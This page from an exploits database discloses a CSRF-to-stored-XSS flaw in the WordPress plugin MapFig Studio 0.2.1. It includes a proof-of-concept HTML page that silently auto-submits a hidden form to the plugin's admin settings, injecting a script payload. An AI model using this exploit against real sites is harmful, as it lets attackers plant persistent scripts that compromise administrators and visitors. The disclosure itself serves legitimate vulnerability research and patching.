[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WordPress MapFig Studio 0.2.1 Cross Site Request Forgery / Cross Site Scripting Vulnerabilities

Author
Vuln Seeker
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-39715
Category
web applications
Date add
14-08-2024
Platform
php
# Exploit Title: MapFig Studio <= 0.2.1 - Stored XSS via CSRF
# Exploit Author: Vuln Seeker Cybersecurity Team
# Vendor Homepage: https://wordpress.org/plugins/mapfig-studio/
# Version: <= 0.2.1
# Tested on: Firefox
# Contact me: vulns@vulnseeker.org

Description

The plugin does not have CSRF check in some places, and is missing
sanitisation as well as escaping, which could allow attackers to make
logged in admin add Stored XSS payloads via a CSRF attack

Proof of Concept

Have a logged in admin open a page containing:

<html>
  <body>
    <form action="http://example.com/wp-admin/admin.php?page=studio_settings"
method="POST">
      <input type="hidden" name="studio_apikey"
value=""><script>alert(1)</script>" />
      <input type="hidden" name="studio_url"
value=""><script>alert(1)</script>" />
      <input type="hidden" name="save" value="Save!" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>



#  0day.today [2024-09-19]  #